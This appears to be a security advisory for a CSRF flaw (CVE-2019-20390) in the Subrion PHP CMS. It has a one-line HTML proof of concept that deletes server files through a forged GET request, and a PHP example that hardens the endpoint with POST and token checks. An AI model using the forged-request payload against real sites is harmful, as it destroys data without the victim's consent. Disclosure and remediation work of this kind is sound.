Cross-Site Request Forgery (CSRF) Affecting intelliants/subrion package, versions >=0.0.0
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 0.12% (46th percentile)
- Snyk ID SNYK-PHP-INTELLIANTSSUBRION-6674056
- published 26 Apr 2024
- disclosed 24 May 2022
- credit Unknown
- Introduced: 24 May 2022
CVE-2019-20390
How to fix?
There is no fixed version for intelliants/subrion.
Overview
intelliants/subrion is an open source PHP content management system.
Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF) because the application does not validate a CSRF token for a GET request. An attacker can craft a malicious URL and send it to the victim; when the victim's browser loads it, files are removed on the server without the victim's knowledge.
PoC
<!-- Deletes file test.txt (target id l1_ci90ZXN0LnR4dA) from directory rm. -->
<html>
<img src="http://localhost/subrion/panel/uploads/read.json?cmd=rm&targets[]=l1_ci90ZXN0LnR4dA" />
</html>
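The missing control in the overview is a token check on the state-changing file-manager command. The following is an added example (not Subrion's code) showing how such an endpoint can refuse the GET-based removal in the PoC: the command name rm and the URL shape come from the advisory, while the session handling, the csrf_token/authorize_command helpers and the token transport are assumptions.

```php
<?php
// Added example, not Subrion's code. Hardens a file-manager endpoint of the
// shape seen in the PoC (read.json?cmd=rm&targets[]=...). Assumes the
// request is already authenticated and a PHP session is used.
declare(strict_types=1);

// Issue a per-session CSRF token; call this when rendering the page that
// builds the file-manager requests, and embed the value in the form/script.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare a submitted token with the session copy in constant time.
function csrf_valid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $submitted !== null && $expected !== ''
        && hash_equals($expected, $submitted);
}

// Decide whether a command may run. A state-changing command ("rm" is the
// one from the advisory; the list is otherwise assumed) must arrive by POST
// with a valid token, so a GET like the PoC's <img> request is refused
// before any target is resolved or deleted. Read-only commands pass through.
function authorize_command(string $method, array $params, ?string $token): bool
{
    $stateChanging = ['rm' => true];
    $cmd = $params['cmd'] ?? '';
    if (!isset($stateChanging[$cmd])) {
        return true;
    }
    return $method === 'POST' && csrf_valid($token);
}

session_start();
// Accept the token from a POST field or a custom header (assumed names);
// never from the query string, which is exactly what a forged URL controls.
$token = $_POST['csrf_token'] ?? ($_SERVER['HTTP_X_CSRF_TOKEN'] ?? null);

if (!authorize_command($_SERVER['REQUEST_METHOD'], $_REQUEST, $token)) {
    http_response_code(403);
    header('Content-Type: application/json');
    echo json_encode(['error' => 'state-changing command requires POST with a valid CSRF token']);
    exit;
}
// Only past this point would targets[] be decoded and the removal performed.
```

Pairing this with a SameSite=Lax or Strict session cookie blocks the cross-site GET in the PoC even in clients that send the cookie on image loads.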
CVSS Scores (version 3.1)